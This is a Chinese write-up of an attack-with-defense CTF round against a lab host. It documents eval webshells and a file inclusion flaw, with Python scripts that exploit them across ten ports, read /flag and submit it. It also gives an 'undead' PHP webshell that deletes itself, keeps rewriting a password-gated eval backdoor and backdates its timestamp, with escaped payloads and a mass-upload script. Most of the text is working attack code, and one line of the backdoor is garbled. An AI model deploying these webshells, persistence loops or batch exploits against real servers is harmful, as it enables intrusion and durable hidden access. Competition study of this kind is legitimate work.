题目环境：

靶机IP： 192.168.2.146

SSH端口： 2201-2210

Web端口： 8801-8810

flag提交地址： 192.168.2.146:8080

flag提交api： 192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag

D盾漏洞

漏洞1——.a.php

漏洞详情：

<?php @eval($_REQUEST['c']);
?>

可以看到是一句话木马。

漏洞利用：

list目录：192.168.2.146:8801/.a.php?c=system(ls);

cat flag：192.168.2.146:8801/.a.php?c=system(“cat /flag”);

批量获取flag + 提交flag 脚本：

# 192.168.2.146:8801/.a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/.a.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        print(res.text)
        flag_payload = { "token" : "team1" , "flag" : res.text}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)

漏洞2——a.php

漏洞详情：

<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>

漏洞利用：

和上一个差不多，但是比上一个.a.php多了var_dump()，因此在获得flag的时候，需要做正则匹配（也可以截取字符串= =、

批量获取flag并提交脚本：

# 192.168.2.146:8801/a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/a.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞3——about.php

漏洞详情：

<?php
	$file=$_GET['file'];
	include $file;
?>

很显然是一个文件包含漏洞：

脚本如下：

# http://192.168.2.146:8801/about.php?file=/flag

import requests

url1 = "http://192.168.2.146:"
url2 = '/about.php'

for i in range(1 , 11):
    payload = { "file" : '/flag'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞4——config.php

还是一句话木马

脚本如下：

# http://192.168.2.146:8801/config.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/config.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

利用一句话木马批量上传不死马

• PHP版本不死马：

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '2.php'; $code = '<?php if(md5($_GET["pass"])=="1ac3544114c9c5e2853a183138093e5e"){@eval($_POST[coin]);} ?>';

while (1){
file_put_contents( f i l e , file, file,code);
system(‘touch -m -d “2018-12-01 09:10:12” .2.php’);
usleep(5000);
}
?>
```

• 在hackbar中上传不死马（假设有密码c为一句话木马的密码

  其中stripslashes()为反转义函数

  c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
  

• 由于批量上传不死马，需要用到Python，因此对上方的PHP不死马需要进行二次转义

  file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
  

• 最终的python脚本

  import time
  import requests
  
  url1 = "http://192.168.2.146:"
  
  url2 = "/.a.php"   #这里的.a.php里有一句话木马 @eval($_REQUEST['c']);
  
  for i in range(1,11):
      print("*****************************")
      url = url1 + str(8800 + i) + url2
      hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));"
      data = {
          "c" : hack
      }
      try:
          upload_res = requests.post(url , data=data)
  
      except:
          continue
      else:
          print("端口号为" + str(8800 + i) + "的机器不死马上传成功" )
          requests_url = url1 + str(8800 + i) + "/bsm.php"  # 访问不死马
          try:
              requests_res = requests.get(requests_url , timeout = 5)
          except:
              time.sleep(6) #程序停止6秒用于生成不死马2.php
              print("-------开始访问不死马获取flag：")
              get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202"
              get_flag_data = {
                  "coin" : "system(\"cat /flag\");"
              }
              get_flag_res = requests.post(get_flag_url , data=get_flag_data)
              print("端口号为"+str(8800+i)+"的机器flag为："+get_flag_res.text[0:32])
              flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]}
              submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
              print("flag提交成功！！！！！！！！！")
  

其余漏洞：